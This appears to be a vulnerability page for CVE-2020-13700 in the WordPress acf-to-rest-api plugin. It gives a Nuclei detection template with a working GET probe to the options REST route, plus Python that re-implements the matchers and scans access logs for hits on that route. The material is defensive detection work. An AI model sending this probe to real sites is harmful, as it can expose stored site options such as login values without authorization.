WordPress acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
ID: CVE-2020-13700
Severity: high
Author: pikpikcu
Tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project
Description
WordPress acf-to-rest-api through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
YAML Source
id: CVE-2020-13700

info:
  name: WordPress acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
  author: pikpikcu
  severity: high
  description: |
    WordPress acf-to-rest-api through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
  impact: |
    An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.
  remediation: |
    Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.
  reference:
    - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
    - https://wordpress.org/plugins/acf-to-rest-api/#developers
    - https://github.com/airesvsg/acf-to-rest-api
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13700
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-13700
    cwe-id: CWE-639
    epss-score: 0.01831
    epss-percentile: 0.88233
    cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: acf_to_rest_api_project
    product: acf_to_rest_api
    framework: wordpress
  tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Content-Type: application/json'

      - type: word
        part: body
        words:
          - 'acf-to-rest-api\/class-acf-to-rest-api.php'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d52904c8ea55fd9a6dbccb7b5dd2b26f290dfd83aafe02be268edd192da9c0c4022027030c66cfd1cd0fc985ee72ec5a77023d27fbb87fa93206c86a80078498f9b6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability described above in a web application. Run it with the Nuclei tool against the target URL; a finding is reported only when all three matchers (JSON content type, the plugin path in the body, and HTTP 200) are satisfied.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-13700.yaml"
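The template's three matchers are joined with matchers-condition: and, and the body word is written in single-quoted YAML, so the backslash is literal: it looks for the JSON-escaped path acf-to-rest-api\/class-acf-to-rest-api.php that PHP's json_encode() emits for the active_plugins value. The Python below is an added example, not part of the Nuclei template or the plugin's code. It re-implements the matcher logic over a constructed HTTP response, then shows the defender-side counterpart: a small access-log scanner that flags requests to the wp-json/acf/v3/options/ route so a team can see whether the endpoint has been read before the plugin was updated. The log lines, IP addresses and response body are constructed; the regex, function names and the ENDPOINT_PREFIX constant are this example's own.

```python
import re
from typing import Mapping

# Matcher values taken from the CVE-2020-13700 Nuclei template above.
EXPECTED_CONTENT_TYPE = "Content-Type: application/json"
# Literal backslash-slash: the template matches the JSON-escaped plugin path,
# which is what PHP's json_encode() produces unless JSON_UNESCAPED_SLASHES is set.
EXPECTED_BODY_WORD = "acf-to-rest-api\\/class-acf-to-rest-api.php"
EXPECTED_STATUS = 200


def headers_to_text(headers: Mapping[str, str]) -> str:
    """Flatten a header mapping into the 'Name: value' lines a part: header matcher sees."""
    return "\r\n".join(f"{k}: {v}" for k, v in headers.items())


def template_matches(status: int, headers: Mapping[str, str], body: str) -> bool:
    """Re-implementation of the template's matchers joined by matchers-condition: and.

    True only when the response carries a JSON content type, the escaped plugin
    path appears in the body, and the status is 200. Any single miss is False.
    """
    header_hit = EXPECTED_CONTENT_TYPE in headers_to_text(headers)
    body_hit = EXPECTED_BODY_WORD in body
    status_hit = status == EXPECTED_STATUS
    return header_hit and body_hit and status_hit


# Constructed response resembling a JSON-encoded active_plugins option value.
SAMPLE_RESPONSE = {
    "status": 200,
    "headers": {"Content-Type": "application/json; charset=UTF-8"},
    "body": '{"a":["acf-to-rest-api\\/class-acf-to-rest-api.php","akismet\\/akismet.php"]}',
}

# --- Access-log detection (defender side) -----------------------------------

# Combined log format parser (constructed regex; enough for the common layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)
# Route prefix from the template's request path (hypothetical constant name).
ENDPOINT_PREFIX = "/wp-json/acf/v3/options/"

# Constructed log lines using RFC 5737 documentation addresses.
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [10/Jun/2020:12:00:01 +0000] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Jun/2020:12:00:02 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 4096 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Jun/2020:12:01:10 +0000] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 401 60 "-" "python-requests/2.23"',
]


def parse_log_line(line: str):
    """Return the named groups of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_options_endpoint_hits(lines):
    """Return (ip, path, status) for each request to the ACF options REST route.

    A 200 is the strongest signal that the option was served to an unauthenticated
    caller; a 401 or 404 suggests the fixed plugin (or its removal) was already in place.
    """
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        if rec["path"].startswith(ENDPOINT_PREFIX):
            hits.append((rec["ip"], rec["path"], int(rec["status"])))
    return hits


if __name__ == "__main__":
    print("template matches sample response:", template_matches(**SAMPLE_RESPONSE))
    for ip, path, status in find_options_endpoint_hits(SAMPLE_LOG_LINES):
        print(f"{ip} requested {path} -> {status}")
```

One caveat the matcher logic makes visible: because the body word contains the escaped `\/`, a site whose PHP emits unescaped slashes would return the same option data without tripping the template, so a clean Nuclei run is not proof that the route is closed. Checking the installed plugin version, or reviewing access logs for the route as the second function does, gives the more reliable answer.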